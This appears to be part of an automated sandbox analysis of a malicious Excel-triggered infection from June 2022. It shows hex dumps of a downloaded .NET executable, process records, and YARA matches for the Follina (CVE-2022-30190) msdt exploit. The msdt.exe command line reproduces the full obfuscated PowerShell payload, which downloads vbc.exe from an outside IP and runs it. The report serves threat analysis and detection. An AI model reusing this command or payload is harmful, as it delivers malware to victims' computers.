00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 ec 06 00 00 00 00 00 48 00 00 00 02 00 05 00 38 62 00 00 48 3f 00 00 03 00 00 00 53 00 00 06 80 a1 00 00 c0 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 c0 00 00 00 00 00 00 00 02 14 7d 01 00 00 04 02 28 13 00 00 0a 00 00 02 28 09 00 00 06 00 7e 02 00 00 04 74 13 00 00 01 19 8d 12 00 00 01 25 16 72 01 00 00 70 a2 25 17 72 1f 00 00 70 a2 25 18 72 31 00 00 70 a2 28 14 00 00 0a 26 02 72 51 00 00 70 02 28 02 00 00 06 28 15 00 00 0a 6f 16 00 00 0a 00 02 7b 06 00 00 04 02 28 05 00 00 06 6f 16 00 00 0a 00 02 7b 07 00 00 04 72 65 00 00 70 02 28 03 00 00 06 28 15 00 00 0a 6f 16 00 00 0a 00 02 7b 08 00 00 04 02 28 06 00 00 06 6f 16 00 00 0a 00 02 7b 09 00 00 04 02 28 07 00 00 06 6f 16 00 00 0a 00 02 7b 0a 00 00 04 02 28 04 00 00 06 6f 16 00 00 0a 00 2a 13 30 03 00 60 00 00 00 01 00 00 11 00 28 17 00 00 0a d0 05 00 00 01 28 18 00 00 0a 16 6f 19 00 00 0a 0a 06 8e 16 fe 03 0b 07 2c 2a 00 06 16 9a 74 05 00 00 01 0c 08 6f 1a 00 00 0a 72 7d 00 00 70 28 1b 00 00 0a 0d 09 2c 0b 00 08 6f 1a 00 00 0a 13 04 2b 14 00 28 17 00 00 0a 6f 1c 00 00 0a 28 1d 00 00 0a 13 04 2b 00 11 04 2a 13 30 01 00 1a 00 00 00 02 00 00 11 00 28 17 00 00 0a 6f 1e 00 00 0a 6f 1f 00 00 0a 6f 20 00 00 0a 0a 2b 00 06 2a 00 00 13 30 03 00 3b 00 00 00 03 00 00 11 00 28 17 00 00 0a d0 06 00 00 01 28 18 00 00 0a 16 6f 19 00 00 0a 0a 06 8e 16 fe 01 0b 07 2c 09 00 72 7d 00 00 70 0c 2b 10 06 16 9a 74 06 00 00 01 6f 21 00
                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELMb0 @ @@@O H.text `.rsrc@@.reloc @BtH8bH?SJ0}((~t%rp%rp%r1p(&rQp((o{(o{rep((o{(o{(o{(o*0`((o,*tor}p(,o+(o(+*0(ooo +*0;((o,r}p+to!
                                                                                                                                                                                            Jun 28, 2022 10:46:37.757917881 CEST11720INData Raw: 00 0a 0c 2b 00 08 2a 00 13 30 03 00 3b 00 00 00 03 00 00 11 00 28 17 00 00 0a d0 09 00 00 01 28 18 00 00 0a 16 6f 19 00 00 0a 0a 06 8e 16 fe 01 0b 07 2c 09 00 72 7d 00 00 70 0c 2b 10 06 16 9a 74 09 00 00 01 6f 22 00 00 0a 0c 2b 00 08 2a 00 13 30
                                                                                                                                                                                            Data Ascii: +*0;((o,r}p+to"+*0;((o,r}p+to#+*0;((o,r}p+to$+*0+,{
                                                                                                                                                                                            Jun 28, 2022 10:46:37.757942915 CEST11721INData Raw: 3d 00 00 0a 6f 48 00 00 0a 00 02 7b 07 00 00 04 72 25 01 00 70 6f 38 00 00 0a 00 02 7b 07 00 00 04 20 0f 01 00 00 1f 11 73 3d 00 00 0a 6f 3e 00 00 0a 00 02 7b 07 00 00 04 16 6f 3f 00 00 0a 00 02 7b 07 00 00 04 72 3f 01 00 70 6f 16 00 00 0a 00 02
                                                                                                                                                                                            Data Ascii: =oH{r%po8{ s=o>{o?{r?po{oI{o5{ 4s6o7{sFoG{s=oH{rOpo8{ s=o>{o?{rmpo
                                                                                                                                                                                            Jun 28, 2022 10:46:37.757967949 CEST11723INData Raw: 17 25 0d 13 27 11 27 2c 04 17 0d 2b 02 16 0d 20 1d 8f fb 0e 13 04 11 04 20 c8 8e fb 0e fe 02 13 28 11 28 2c 09 20 0e 8f fb 0e 13 04 2b 1d 11 04 20 db 8e fb 0e fe 02 16 fe 01 13 29 11 29 2c 08 11 04 17 58 13 04 2b 03 16 13 04 17 13 05 11 05 16 fe
                                                                                                                                                                                            Data Ascii: %'',+ ((, + )),X+**,+%++,+ ,,, + --,X+..,+%//,+00,+%11,+
                                                                                                                                                                                            Jun 28, 2022 10:46:37.757992029 CEST11724INData Raw: 09 20 f1 8e fb 0e 13 1c 2b 1d 11 1c 20 14 8f fb 0e fe 02 16 fe 01 13 59 11 59 2c 08 11 1c 17 58 13 1c 2b 03 16 13 1c 20 e9 8e fb 0e 13 1d 11 1d 20 f1 8e fb 0e fe 02 13 5a 11 5a 2c 09 20 d9 8e fb 0e 13 1d 2b 1d 11 1d 20 d2 8e fb 0e fe 02 16 fe 01
                                                                                                                                                                                            Data Ascii: + YY,X+ ZZ, + [[,X+\\,+%]],+ ^^, + __,X+(noo`+`*B(*0
                                                                                                                                                                                            Jun 28, 2022 10:46:37.758013964 CEST11726INData Raw: 00 00 0a 00 02 7b 0d 00 00 04 6f 3a 00 00 0a 18 22 00 00 20 41 73 3b 00 00 0a 6f 3c 00 00 0a 26 02 7b 0d 00 00 04 6f 3a 00 00 0a 18 22 00 00 20 41 73 3b 00 00 0a 6f 3c 00 00 0a 26 02 7b 0d 00 00 04 6f 3a 00 00 0a 18 22 00 00 20 41 73 3b 00 00 0a
                                                                                                                                                                                            Data Ascii: {o:" As;o<&{o:" As;o<&{o:" As;o<&{o:" As;o<&{o:"HBs;o<&{o:" As;o<&{ s=o>{o?{o5{rpo@t
                                                                                                                                                                                            Jun 28, 2022 10:46:37.758039951 CEST11727INData Raw: 00 00 04 28 50 00 00 0a 00 02 22 00 00 c0 40 22 00 00 50 41 73 51 00 00 0a 28 52 00 00 0a 00 02 17 28 53 00 00 0a 00 02 20 b3 01 00 00 20 1b 01 00 00 73 3d 00 00 0a 28 54 00 00 0a 00 02 28 55 00 00 0a 02 7b 0d 00 00 04 6f 56 00 00 0a 00 02 19 28
                                                                                                                                                                                            Data Ascii: (P"@"PAsQ(R(S s=(T(U{oV(W(X(Yr3p(8sZ([(\(](^r3po{o_{o`{oa(_*&(p*09~
                                                                                                                                                                                            Jun 28, 2022 10:46:37.758064985 CEST11728INData Raw: 02 73 2b 00 00 0a 7d 23 00 00 04 02 73 2b 00 00 0a 7d 24 00 00 04 02 73 2b 00 00 0a 7d 25 00 00 04 02 73 2b 00 00 0a 7d 26 00 00 04 02 73 2b 00 00 0a 7d 27 00 00 04 02 73 2a 00 00 0a 7d 28 00 00 04 02 73 2b 00 00 0a 7d 29 00 00 04 02 28 2d 00 00
                                                                                                                                                                                            Data Ascii: s+}#s+}$s+}%s+}&s+}'s*}(s+})(-{ Ns6o7{rpo8{ s=o>{o?{rpo{o{ so{ s6o7
                                                                                                                                                                                            Jun 28, 2022 10:46:37.758090019 CEST11730INData Raw: 00 0a 00 02 7b 26 00 00 04 20 2c 01 00 00 1f 16 73 3d 00 00 0a 6f 3e 00 00 0a 00 02 7b 26 00 00 04 1f 0d 6f 3f 00 00 0a 00 02 7b 27 00 00 04 20 89 00 00 00 20 e4 00 00 00 73 36 00 00 0a 6f 37 00 00 0a 00 02 7b 27 00 00 04 72 30 06 00 70 6f 38 00
                                                                                                                                                                                            Data Ascii: {& ,s=o>{&o?{' s6o7{'r0po8{' Ds=o>{'o?{(o{($ s6o7{(rBpo8{( s=o>{(o?{(rRpo{)
                                                                                                                                                                                            Jun 28, 2022 10:46:37.758115053 CEST11731INData Raw: 00 00 04 02 28 2d 00 00 0a 00 02 7b 2c 00 00 04 17 6f 83 00 00 0a 00 02 7b 2c 00 00 04 72 1c 07 00 70 22 00 00 90 41 16 19 16 73 8f 00 00 0a 6f 90 00 00 0a 00 02 7b 2c 00 00 04 1f 0c 1f 09 73 36 00 00 0a 6f 37 00 00 0a 00 02 7b 2c 00 00 04 72 46
                                                                                                                                                                                            Data Ascii: (-{,o{,rp"Aso{,s6o7{,rFpo8{, 7s=o>{,o?{,r\po{-o{-rp"Aso{- s6o7{-rjpo8{- 7s
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874607086 CEST11733INData Raw: 00 04 72 1c 07 00 70 22 00 00 81 41 16 19 16 73 8f 00 00 0a 6f 90 00 00 0a 00 02 7b 36 00 00 04 20 a0 00 00 00 20 b9 01 00 00 73 36 00 00 0a 6f 37 00 00 0a 00 02 7b 36 00 00 04 72 84 08 00 70 6f 38 00 00 0a 00 02 7b 36 00 00 04 20 12 03 00 00 1f
                                                                                                                                                                                            Data Ascii: rp"Aso{6 s6o7{6rpo8{6 \s=o>{6o?{6rpo{6o{6&so{7o{7rp"Aso{7 {s6o7{7rpo8


                                                                                                                                                                                            Statistics

                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                            Behavior

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            System Behavior

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                            Start time:10:44:27
                                                                                                                                                                                            Start date:28/06/2022
                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                                            Imagebase:0x1130000
                                                                                                                                                                                            File size:27110184 bytes
                                                                                                                                                                                            MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                            Start time:10:45:24
                                                                                                                                                                                            Start date:28/06/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'U1RvcC1wck9jZVNTIC1Gb3JDZSAtbkFtZSAnbXNkdCc7JFdaID0gYWRkLVR5cEUgLW1FbWJlcmRFZmluSXRJT04gJ1tEbGxJbXBvcnQoInVyTE1vTi5kbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIEtXTCxzdHJpbmcgcEssc3RyaW5nIGp0Ryx1aW50IEV3LEludFB0ciB6YmcpOycgLU5hbWUgIlFXYiIgLU5hTWVTUGFjZSBtcyAtUGFzc1RocnU7ICRXWjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTE5LjQ4Lzg3MC92YmMuZXhlIiwiJGVOdjpQVUJMSUNcdmJjLmV4ZSIsMCwwKTtzdEFyVC1zTGVFUCgzKTtyVW5kbEwzMi5lWEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkRW52OlBVQkxJQ1x2YmMuZXhlIjtTdG9QLVByb2NFU3MgLUZPcmNFIC1uYW1FICdzZGlhZ25ob3N0Jw=='+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi
                                                                                                                                                                                            Imagebase:0x1210000
                                                                                                                                                                                            File size:1508352 bytes
                                                                                                                                                                                            MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000D.00000002.511764004.0000000000828000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000D.00000002.512140531.00000000009A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000D.00000002.512279726.0000000000C80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                            Start time:10:46:00
                                                                                                                                                                                            Start date:28/06/2022
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.cmdline
                                                                                                                                                                                            Imagebase:0x13d0000
                                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                            Start time:10:46:03
                                                                                                                                                                                            Start date:28/06/2022
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP"
                                                                                                                                                                                            Imagebase:0xd50000
                                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                            Start time:10:46:09
                                                                                                                                                                                            Start date:28/06/2022
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.cmdline
                                                                                                                                                                                            Imagebase:0x13d0000
                                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                            Start time:10:46:12
                                                                                                                                                                                            Start date:28/06/2022
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP"
                                                                                                                                                                                            Imagebase:0xd50000
                                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                            Start time:10:46:32
                                                                                                                                                                                            Start date:28/06/2022
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1cq1zudv\1cq1zudv.cmdline
                                                                                                                                                                                            Imagebase:0x13d0000
                                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            Disassembly

                                                                                                                                                                                            No disassembly